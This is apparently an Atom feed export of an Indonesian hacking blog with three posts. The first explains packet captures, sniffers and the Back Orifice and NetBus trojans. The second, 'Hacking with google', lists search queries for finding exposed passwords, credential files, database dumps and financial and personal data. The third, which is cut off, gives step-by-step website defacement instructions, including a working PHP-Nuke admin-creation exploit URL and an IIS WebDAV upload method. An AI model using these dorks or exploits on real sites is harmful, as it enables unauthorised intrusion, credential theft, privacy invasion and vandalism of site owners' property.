1:296(295) ack 1 win 5840 (DF) 06:46:31.338893 192.168.1.1.80 &gt; 192.168.1.7.1043: . ack 296 win 32441 (DF) 06:46:31.738893 192.168.1.1.80 &gt; 192.168.1.7.1043: P &lt;br /&gt; 1:200(199) ack 296 win 32736 (DF) 06:46:31.868893 192.168.1.7.1043 &gt; 192.168.1.1.80: . ack 200 win 5641 (DF) 06:46:31.898893 192.168.1.1.1492 &gt; 192.168.1.7.113: S 2035772989:2035772989(0) win 512 &lt;mss 1460&gt; 06:46:31.898893 192.168.1.7.113 &gt; 192.168.1.1.1492: R 0:0(0)ack 2035772990 win 0 06:46:39.028893 192.168.1.7 &gt; 192.168.1.1: icmp: echo request 06:46:39.028893 192.168.1.1 &gt; 192.168.1.7: icmp: echo reply 06:46:40.028893 192.168.1.7 &gt; 192.168.1.1: icmp: echo request 06:46:40.028893 192.168.1.1 &gt; 192.168.1.7: icmp: echo reply 06:46:41.028893 192.168.1.7 &gt; 192.168.1.1: icmp: echo request 06:46:41.028893 192.168.1.1 &gt; 192.168.1.7: icmp: echo reply 06:46:42.038893 192.168.1.7 &gt; 192.168.1.1: icmp: echo request 06:46:42.038893 192.168.1.1 &gt; 192.168.1.7: icmp: echo reply 06:46:44.048893 192.168.1.7.1043 &gt; 192.168.1.1.80: P 296:591(295) ack 200 win 5641 (DF) 06:46:44.048893 192.168.1.1.80 &gt; 192.168.1.7.1043: P 200:398(198) ack 591 win 32736 (DF) 06:46:44.168893 192.168.1.7.1043 &gt; 192.168.1.1.80: . ack 398 win 5443 (DF) &lt;br /&gt; Dalam contoh di atas, pada baris-baris pertama, ditunjukkan sebuah sesi web browsing (lihat port 80 yang digunakan sebagai target port) dari sebuah komputer dengan nomor IP 192.168.1.7 ke server web dengan nomor IP 192.168.1.1. Di sesi itu nampak three way handshaking (paket SYN, dibalas dengan SYN/ACK, dan dibalas dengan ACK). Untuk mengetahui lebih lengkap tentang paket-paket ini, silahkan baca buku “TCP/IP Illustrated” dari Richard Stevens atau buku “Network Intrusion Detection” (Stephen Northcutt &amp; Judy Novak). Selain sesi web, nampak juga sesi ping dimana ada paket “ICMP echo request” yang dibalas dengan paket “ICMP echo reply”. Ping ini juga dikirimkan dari IP 192.168.1.7 ke komputer dengan IP 192.168.1.1. &lt;br /&gt;Sniffer Pro Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem Windows. Program ini dibuat oleh Network Associates dan cukup lengkap fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan (rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat menarik dan membantu administrator. &lt;br /&gt;Anti Sniffer Untuk menutup lubang keamanan dari kegiatan sniffing, administrator dapat membuat jaringannya bersegmen dan menggunakan perangkat switch sebagai pengganti hub biasa. Selain itu dapat juga digunakan program untuk mendeteksi adanya penggunaan sniffer di jaringan yang dikelolanya. Program pendeteksi sniffer ini disebut anti-sniffer. Program anti-sniffer bekerja dengan mengirimkan packet palsu ke dalam jaringan dan mendeteksi responnya. Ethernetcard yang diset ke dalam promiscuous mode (yang umumnya digunakan ketika melakukan sniffing) dan program yang digunakan untuk menyadap sering memberikan jawaban atas packet palsu ini. Dengan adanya jawaban tersebut dapat diketahui bahwa ada yang melakukan kegiatan sniffing. &lt;br /&gt;Trojan Horse Trojan horse di sistem komputer adalah program yang disisipkan tanpa pengetahuan si pemilik komputer. Trojan horse ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan menggunakan timer (pewaktu). Akibatnya, komputer yang disisipi trojan horse tersebut dapat dikendalikan dari jarak jauh. Ada yang mengatakan bahwa sebetulnya program ini mirip remote administration. Memang sifat dan fungsinya sama. Remote administration / access program seperti pcAnywhere digunakan untuk keperluan yang benar (legitimate). Sementara trojan horse biasanya digunakan untuk keperluan yang negatif. Back Orifice (BO) Back Orifice (BO) merupakan trojan horse untuk sistem yang menggunakan operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah keluar BO 2000 untuk sistem operasi Windows 2000. BO terdiri dari server (yang dipasang atau disisipkan di komputer target) dan client (yang digunakan untuk mengendalikan server). Akses ke server BO dapat diproteksi dengan menggunakan password sehingga mengecohkan atau membatasi akses oleh orang lain. Dengan menggunakan BO, intruder dapat mengirimkan pesan sesuai dengan yang kita inginkan. Mengirim pesan mungkin tidak terlalu bermasalah, meskipun menggangu. Bayangkan jika intruder tersebut memformat harddisk anda atau menangkan keystroke anda (apalagi kalau anda menuliskan userid dan password). Server BO menggunakan TCP/IP dan menunggu di port 31337. Jika di komputer anda port tersebut terbuka, ada kemungkinan BO sudah terpasang di sana. Namun, nomor port dari BO dapat dipindahkan ke nomor port lain sehingga mengelabui administrator. Mendeteksi BO Gunakan program "REGEDIT" dan cari&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices&lt;br /&gt; Jika variabel tersebut berisi, maka anda sudah terkena BO. Catatan: nama file adalah space-dot-exe. Cek di direktory "Windows\SYSTEM\" jika ada nama file yang kosong atau titik, dan ukurannya (sama dengan atau lebih besar dari) 122KB, kemungkinan itu BO. File tersebut tidak dapat dihapus begitu saja. Sumber informasi tentang BO dapat diperoleh dari : • http://www.nwi.net/~pchelp/bo/bo.html • http://www.bo2k.com  • http://www.iss.net/xforce/alerts/advise5.html &lt;br /&gt;NetBus NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat digunakan untuk mengelola komputer Windows 95/98/NT dari jarak jauh untuk mengakses data dan fungsi dari komputer tersebut. NetBus terdiri dari client dan server. Versi 1.60 dari NetBus server adalah Windows PE file yang bernama PATCH.EXE. Jika dia terpasang (installed) maka dia akan langsung dijalankan ketika komputer di"StartUp". Eksekusi dari server ada di HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Porsi dari server NetBus cukup canggih dimana dia menghilangkan jejaknya dari daftar proses yang jalan, dan tidak memperbolehkan dirinya dihapus atau di"rename". Jika server tersebut dijalankan dengan menggunakan "/remove", maka dia akan menghilangkan diri (remove) dari sistem itu. Porsi client digunakan untuk mengendalikan komputer yang sudah terpasang NetBus. Komunikasi dilakukan dengan menggunakan TCP/IP. Client dapat melakukan port scanning untuk mencari dimana server berada. NetBus dapat mengirimkan "keystroke" seolah-olah user yang mengetikkannya di depan layar, dan juga dapat menangkap "keystroke" serta menyimpannya dalam sebuah berkas. Pengamanan terhadap serangan NetBus dapat dilakukan dengan menggunakan program Busjacker dan F-Secure. Informasi mengenai NetBus dapat diperoleh di http://www.netbus.org.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-6568183127493419262?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/6568183127493419262/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=6568183127493419262&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/6568183127493419262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/6568183127493419262'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/eksploitasi-keamanan-jaringan.html' title='Eksploitasi keamanan jaringan'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-2402690634026740751</id><published>2008-02-01T03:27:00.000-08:00</published><updated>2008-06-29T03:52:31.781-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Hacking with google</title><content type='html'>Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.&lt;br /&gt;dari tutorial ini yang akan didapatkan adalah:&lt;br /&gt;Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya &lt;br /&gt;Bagaimana cara mencari informasi tentang vulnerable systems and Web services &lt;br /&gt;Bagaimana cara mencari publicly available network devices. &lt;br /&gt;Hal pertama dari yang harus di ketahui adalah Google Query Operators&lt;br /&gt;Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….&lt;br /&gt;site&lt;br /&gt;memfilter berdasarkan domain yang ada&lt;br /&gt;contoh: site:google.com fox —&gt; akan mencari kata fox di situs google.com&lt;br /&gt;intitle&lt;br /&gt;Memfilter dokumen yang memiliki title yang spesifik&lt;br /&gt;contoh: intitle:fox fire —&gt; akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire&lt;br /&gt;allintitle&lt;br /&gt;Memfilter dokumen untuk mencari intitle intile&lt;br /&gt;contoh: allintitle:fox fire —&gt; akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire&lt;br /&gt;inurl&lt;br /&gt;Memfilter pencarian dengan url yang spesifik&lt;br /&gt;contoh: inurl:fox fire —&gt; akan mencari kata fire di website yang url nya terdapat fox&lt;br /&gt;allinurl&lt;br /&gt;Sama dengan Allintitle (hanya ini url)&lt;br /&gt;filetype, ext&lt;br /&gt;Memfilter pencarian untuk dokumen yang spesifik&lt;br /&gt;contoh: filetype:pdf fire —&gt; akan mencari file PDF yang didalamnya terdapat kata fire&lt;br /&gt;contoh keren: filetype:doc skripsi IT&lt;br /&gt;numrange&lt;br /&gt;Memfilter dokumen berdasarkan range tertentu&lt;br /&gt;contoh: numrange:1-100 fire —&gt; akan mencari range 1-100 yang terdapat kata fire&lt;br /&gt;link&lt;br /&gt;Memfilter site site yang memiliki link terhadap site tertentu&lt;br /&gt;contoh: link:www.google.com —&gt; akan mencari site site mana aja yang memiliki links ke google.com&lt;br /&gt;inanchor&lt;br /&gt;Memfilter berdasarkan site description yang ada&lt;br /&gt;contoh: inanchor:fire —&gt; akan mencari web yang memiliki deskripsi fire&lt;br /&gt;kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:&lt;br /&gt;/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )&lt;br /&gt;nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……&lt;br /&gt;Web Server&lt;br /&gt;untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:&lt;br /&gt;“Apache/1.3.28 Server at” intitle:index.of&lt;br /&gt;–&gt; Apache 1.3.28&lt;br /&gt;“Apache/2.0 Server at” intitle:index.of&lt;br /&gt;–&gt; Apache 2.0&lt;br /&gt;“Apache/* Server at” intitle:index.of&lt;br /&gt;–&gt; semua versi dari Apache&lt;br /&gt;“Microsoft-IIS/4.0 Server at” intitle:index.of&lt;br /&gt;–&gt; Microsoft Internet Information Services 4.0&lt;br /&gt;“Microsoft-IIS/5.0 Server at” intitle:index.of&lt;br /&gt;–&gt; Microsoft Internet Information Services 5.0&lt;br /&gt;“Microsoft-IIS/6.0 Server at” intitle:index.of&lt;br /&gt;–&gt; Microsoft Internet Information Services 6.0&lt;br /&gt;“Microsoft-IIS/* Server at” intitle:index.of&lt;br /&gt;–&gt; semua versi dari Microsoft Internet Information Services&lt;br /&gt;“Oracle HTTP Server/* Server at” intitle:index.of&lt;br /&gt;–&gt; semua versi dari Oracle HTTP Server&lt;br /&gt;“IBM _ HTTP _ Server/* * Server at” intitle:index.of&lt;br /&gt;–&gt; semua versi dari IBM HTTP Server&lt;br /&gt;“Netscape/* Server at” intitle:index.of&lt;br /&gt;–&gt; semua versi dari Netscape Server&lt;br /&gt;“Red Hat Secure/*” intitle:index.of&lt;br /&gt;–&gt; semua versi dari the Red Hat Secure server&lt;br /&gt;“HP Apache-based Web Server/*” intitle:index.of&lt;br /&gt;–&gt; semua versi dari the HP server&lt;br /&gt;Beberapa Bug pada Skripts dapat ditemukan google:&lt;br /&gt;“Generated by phpSystem”&lt;br /&gt;–&gt; dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points&lt;br /&gt;“This summary was generated by wwwstat”&lt;br /&gt;–&gt; web server statistics, system file structure&lt;br /&gt;“These statistics were produced by getstats”&lt;br /&gt;–&gt;web server statistics, system file structure&lt;br /&gt;“This report was generated by WebLog”&lt;br /&gt;–&gt;web server statistics, system file structure&lt;br /&gt;intext:”Tobias Oetiker” “traffic analysis”&lt;br /&gt;–&gt;system performance statistics as MRTG charts, network configuration&lt;br /&gt;intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)&lt;br /&gt;–&gt;server version, operating system type, child process list,current connections&lt;br /&gt;intitle:”ASP Stats Generator *.*” “&lt;br /&gt;–&gt;ASP Stats&lt;br /&gt;Generator” “2003-2004 weppos”&lt;br /&gt;–&gt;web server activity, lots of visitor information&lt;br /&gt;intitle:”Multimon UPS status page”&lt;br /&gt;–&gt;UPS device performance statistics&lt;br /&gt;intitle:”statistics of” “advanced web statistics”&lt;br /&gt;–&gt;web server statistics, visitor information&lt;br /&gt;intitle:”System Statistics” +”System and Network Information Center”&lt;br /&gt;–&gt;system performance statistics as MRTG charts, hardware configuration, running services&lt;br /&gt;intitle:”Usage Statistics for” “Generated by Webalizer”&lt;br /&gt;–&gt;web server statistics, visitor information, system file structure&lt;br /&gt;intitle:”Web Server Statistics for ****”&lt;br /&gt;–&gt;web server statistics, visitor information&lt;br /&gt;inurl:”/axs/ax-admin.pl” -script&lt;br /&gt;–&gt;web server statistics, visitor information&lt;br /&gt;inurl:”/cricket/grapher.cgi”&lt;br /&gt;–&gt;MRTG charts of network interface performance&lt;br /&gt;inurl:server-info “Apache Server Information”&lt;br /&gt;–&gt;web server version and configuration, operating system type, system file structure&lt;br /&gt;“Output produced by SysWatch *”&lt;br /&gt;–&gt;operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs&lt;br /&gt;Error message queries&lt;br /&gt;Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.&lt;br /&gt;“A syntax error has occurred” filetype:ihtml&lt;br /&gt;–&gt;Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords&lt;br /&gt;“Access denied for user” “Using password”&lt;br /&gt;–&gt;authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code&lt;br /&gt;“The script whose uid is ” “is not allowed to access”&lt;br /&gt;–&gt;access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information&lt;br /&gt;“ORA-00921: unexpected end of SQL command”&lt;br /&gt;–&gt;Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information&lt;br /&gt;“error found handling the request” cocoon filetype:xml&lt;br /&gt;–&gt;Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information&lt;br /&gt;“Invision Power Board Database Error”&lt;br /&gt;–&gt;Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code&lt;br /&gt;“Warning: mysql _ query()” “invalid query”&lt;br /&gt;–&gt;MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information&lt;br /&gt;“Error Message : Error loading required libraries.”&lt;br /&gt;–&gt;CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information&lt;br /&gt;“#mysql dump” filetype:sql&lt;br /&gt;–&gt;MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents&lt;br /&gt;Google queries untuk mencari lokasi passwords&lt;br /&gt;kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google&lt;br /&gt;“http://*:*@www”&lt;br /&gt;site passwords for site, stored as the string&lt;br /&gt;“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”&lt;br /&gt;file backups, berpotensial untuk mengambil user names and passwords&lt;br /&gt;filetype:mdb inurl:”account|users|admin|administrators|passwd|password”&lt;br /&gt;mdb files, berpotensial untuk mengambil password information&lt;br /&gt;intitle:”Index of” pwd.db&lt;br /&gt;pwd.db files, berpotensial untuk mengambil user names and encrypted passwords&lt;br /&gt;inurl:admin inurl:backup intitle:index.of&lt;br /&gt;directories whose names contain the words admin and backup&lt;br /&gt;“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD&lt;br /&gt;WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords&lt;br /&gt;ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”&lt;br /&gt;Terdapat Microsoft FrontPage passwords&lt;br /&gt;filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )&lt;br /&gt;Terdapat SQL code and passwords yang disimpan dalam a database&lt;br /&gt;intitle:index.of trillian.ini&lt;br /&gt;configuration files for the Trillian IM&lt;br /&gt;eggdrop filetype:user&lt;br /&gt;user configuration files for the Eggdrop ircbot&lt;br /&gt;filetype:conf slapd.conf configuration files for OpenLDAP&lt;br /&gt;inurl:”wvdial.conf” intext:”password” configuration files for WV Dial&lt;br /&gt;ext:ini eudora.ini configuration files for the Eudora mail client&lt;br /&gt;filetype:mdb inurl:users.mdb&lt;br /&gt;Microsoft Access files, berpotensial untuk mengambil user account information&lt;br /&gt;intext:”powered by Web Wiz Journal”&lt;br /&gt;websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/&lt;br /&gt;“Powered by DUclassified” -site:duware.com&lt;br /&gt;“Powered by DUcalendar” -site:duware.com&lt;br /&gt;“Powered by DUdirectory” -site:duware.com&lt;br /&gt;“Powered by DUclassmate” -site:duware.com&lt;br /&gt;“Powered by DUdownload” -site:duware.com&lt;br /&gt;“Powered by DUpaypal” -site:duware.com&lt;br /&gt;“Powered by DUforum” -site:duware.com&lt;br /&gt;intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com&lt;br /&gt;websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file&lt;br /&gt;– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb&lt;br /&gt;atau http:///duClassified/&lt;br /&gt;intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”&lt;br /&gt;website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained&lt;br /&gt;– dengan cara http:///forum/admin/data _ passwd.dat&lt;br /&gt;atau http:///forum/forum.php&lt;br /&gt;Mencari Dokumen khusus ?&lt;br /&gt;filetype:xls inurl:”email.xls” email.xls&lt;br /&gt;files, berpotensial untuk mengambil contact information&lt;br /&gt;“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”&lt;br /&gt;CVs&lt;br /&gt;“not for distribution”&lt;br /&gt;confidential documents containing the confidential clause&lt;br /&gt;buddylist.blt&lt;br /&gt;AIM contacts list&lt;br /&gt;intitle:index.of mystuff.xml&lt;br /&gt;Trillian IM contacts list&lt;br /&gt;filetype:ctt “msn”&lt;br /&gt;MSN contacts list&lt;br /&gt;filetype:QDF&lt;br /&gt;QDF database files for the Quicken financial application&lt;br /&gt;intitle:index.of finances.xls&lt;br /&gt;finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers&lt;br /&gt;intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail&lt;br /&gt;“Network Vulnerability Assessment Report”&lt;br /&gt;“Host Vulnerability Summary Report”&lt;br /&gt;filetype:pdf “Assessment Report”&lt;br /&gt;“This file was generated by Nessus”&lt;br /&gt;reports for network security scans, penetration tests etc. On the Net&lt;br /&gt;untuk lebih kreatifnya bisa di coba coba sendiri, okeh&lt;br /&gt;reference:&lt;br /&gt;http://johnny.ihackstuff.com – largest repository of data on Google hacking, &lt;br /&gt;http://insecure.org/nmap/ – Nmap network scanner, &lt;br /&gt;http://thc.org/thc-amap/ – amap network scanner.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-2402690634026740751?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/2402690634026740751/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=2402690634026740751&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/2402690634026740751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/2402690634026740751'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/hacking-with-google.html' title='Hacking with google'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4336081184723738648</id><published>2008-01-31T01:27:00.000-08:00</published><updated>2008-06-29T03:58:45.000-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>langkah-langkah deface</title><content type='html'>&lt;div class="post_content"&gt;&lt;p&gt;&lt;strong&gt;Deface situs php nuke&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Buka situs www.google.com&lt;br /&gt;&lt;br /&gt;kemudian ketik =&gt;&lt;br /&gt;&lt;br /&gt;allinurl:.com/nuke/index.php atau&lt;br /&gt;&lt;br /&gt;allinurl:.org/nuke/index.php.&lt;br /&gt;&lt;br /&gt;Nah &amp;#8230;.. kalo  udah ketemu targetnya maka langkah&lt;br /&gt;&lt;br /&gt;selanjutnya adalah :&lt;br /&gt;&lt;br /&gt;1. www.target.com/nuke/index.php&lt;br /&gt;&lt;br /&gt;2. www.target.com/nuke/admin.php =&gt;&lt;br /&gt;&lt;br /&gt;index.php yg diatas tadi dirubah&lt;br /&gt;&lt;br /&gt;menjadi admin.php&lt;br /&gt;&lt;br /&gt;3. Masukkan bug ini di belakang situs tadi :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;?op=AddAuthor&amp;#038;add_aid=budakbaonk&amp;#038;add_name=&lt;br /&gt;&lt;br /&gt;God&amp;#038;add_pwd=bajingan&amp;#038;add_email=&lt;br /&gt;&lt;br /&gt;sandal_karet@yahoo.com&amp;#038;add_radminsuper=1&amp;#038;admin=&lt;br /&gt;&lt;br /&gt;eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;/p&gt;&lt;br /&gt;&lt;p&gt;misal : www.target.com/nuke/admin.php?&lt;br /&gt;&lt;br /&gt;op=AddAuthor&amp;#038;add_aid=budakbaonk&amp;#038;add_name=&lt;br /&gt;&lt;br /&gt;God&amp;#038;add_pwd=bajingan&amp;#038;add_email=&lt;br /&gt;&lt;br /&gt;sandal_karet@yahoo.com&amp;#038;add_radminsuper=1&amp;#038;admin=&lt;br /&gt;&lt;br /&gt;eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Kalo nggak mau berarti situs tsb udah di path ama admin nya.&lt;br /&gt;&lt;br /&gt;Tapi kalo berhasil, maka di url/browsing lu muncul&lt;br /&gt;&lt;br /&gt;www.target.com/nuke/admin.php?op=mod_author&lt;/p&gt;&lt;br /&gt;&lt;p&gt;5. Disana lu di suruh login, masukin id &amp;#038; password lu tadi.&lt;br /&gt;&lt;br /&gt;Masih ingat kan ?&lt;br /&gt;&lt;br /&gt;id=budakbaonk            =&gt; liat yg diatas tadi&lt;br /&gt;&lt;br /&gt;password=bajingan        =&gt; liat yg diatas tadi&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Nah lu skrg udah masuk ke &amp;#8220;Administration Menu&amp;#8221; situs tsb.&lt;br /&gt;&lt;br /&gt;Berarti lu udah mengusai situs tsb skrg ! He he he he he&lt;br /&gt;&lt;br /&gt;Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),&lt;br /&gt;&lt;br /&gt;Kolom title =&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/1.bmp" /&gt;&lt;br /&gt;&lt;br /&gt;Kolom content =&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/2.bmp" /&gt;&lt;br /&gt;&lt;br /&gt;Kolom expiration =&gt; unlimited&lt;br /&gt;&lt;br /&gt;trus klik tab add messages yg ada dibawah&lt;br /&gt;&lt;br /&gt;Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,&lt;br /&gt;&lt;br /&gt;misal www.target.com/nuke atau www.target.com/nuke/index.php&lt;br /&gt;&lt;br /&gt;kalo nggak ada hasil deface lu coba klik tab refresh yg ada&lt;br /&gt;&lt;br /&gt;diatas yg disamping url/browsing lu&lt;/p&gt;&lt;br /&gt;&lt;p&gt;========================================&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;Deface asp/iis dgn menggunakan win 98&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;1. Klik Icon &amp;#8220;My Computer&amp;#8221; di komputer kamu.&lt;br /&gt;&lt;br /&gt;2. Cari Icon &amp;#8220;Web Folder&amp;#8221; didalam My Computer Itu.&lt;br /&gt;&lt;br /&gt;3. Klick lagi Icon &amp;#8220;Add web folder&amp;#8221; dan akan muncul&lt;br /&gt;&lt;br /&gt;&amp;#8220;Type the location to add&amp;#8221;.&lt;br /&gt;&lt;br /&gt;4. Ketiklah nama situs yang akan kita deface/tambahkan filenya&lt;br /&gt;&lt;br /&gt;misalnya   http://www.52down.com. Kemudian klik Next.&lt;br /&gt;&lt;br /&gt;5. Muncul &amp;#8220;Enter the name for this Web Folder&amp;#8221;, kemudian klik Finish.&lt;br /&gt;&lt;br /&gt;kalau tidak ada &amp;#8220;Finish&amp;#8221; nya atau &amp;#8220;Error&amp;#8221; artinya tidak bisa dideface&lt;br /&gt;&lt;br /&gt;jadi kamu musti cari target lain.&lt;br /&gt;&lt;br /&gt;6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat&lt;br /&gt;&lt;br /&gt;ada file http://www.52down.com. Klik file situs tsb.&lt;br /&gt;&lt;br /&gt;7. Buka file &amp;#8220;Hacked.html&amp;#8221; kamu tadi (kalo belum ada file html,&lt;br /&gt;&lt;br /&gt;lu buat dulu file html di ms.fronpage trus simpan di kompi lu)&lt;br /&gt;&lt;br /&gt;terus copy kemudian kembali lagi ke file http://www.52down.com,&lt;br /&gt;&lt;br /&gt;paste kan file &amp;#8220;Test.html&amp;#8221; tadi. Kalau tidak bisa di paste kan artinya&lt;br /&gt;&lt;br /&gt;udah dipath sama adminnya, jadi kamu musti cari target lain.&lt;br /&gt;&lt;br /&gt;8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing&lt;br /&gt;&lt;br /&gt;misalnya  http://www.52down.com/Test.html&lt;br /&gt;&lt;br /&gt;9. Kalau mau mencari target caranya cari di www.google.com terus&lt;br /&gt;&lt;br /&gt;ketik allinurl:.com/index.asp atau allinurl:.org/default.asp&lt;br /&gt;&lt;br /&gt;tinggal kreatifitas kamu mencari target.&lt;br /&gt;&lt;br /&gt;Atau bisa cari target di http://www.zone-h.org/en/defacements/&lt;br /&gt;&lt;br /&gt;klik mirror yg sebelah kanan (yg windows 2000),&lt;br /&gt;&lt;br /&gt;Perhatikan target nya =&gt; Defacer: Infektion Group&lt;br /&gt;&lt;br /&gt;Domain : www.namatarget.com  &lt;&lt; ini target nya&lt;/p&gt;&lt;br /&gt;&lt;p&gt;=======================================&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;cara membuat html :&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,&lt;br /&gt;&lt;br /&gt;trus pilih enable hyperlink, trus pilih color background,&lt;br /&gt;&lt;br /&gt;pilih warna hitam, trus ok&lt;br /&gt;&lt;br /&gt;Trus pilih tab center yg diatas (rata tengah) kayak ms.word,&lt;br /&gt;&lt;br /&gt;ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),&lt;br /&gt;&lt;br /&gt;pilih warna merah, kalo udah tulis Hacked by nama nick kamu,&lt;br /&gt;&lt;br /&gt;tekan enter 3 kali Trus ketik&lt;br /&gt;&lt;br /&gt;Hey Admin&amp;#8230;&amp;#8230;..do you a need help ? trus enter sekali,&lt;br /&gt;&lt;br /&gt;trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali&lt;br /&gt;&lt;br /&gt;Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,&lt;br /&gt;&lt;br /&gt;trus pilih from file&amp;#8230;., di file name ketik&lt;br /&gt;&lt;br /&gt;http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc 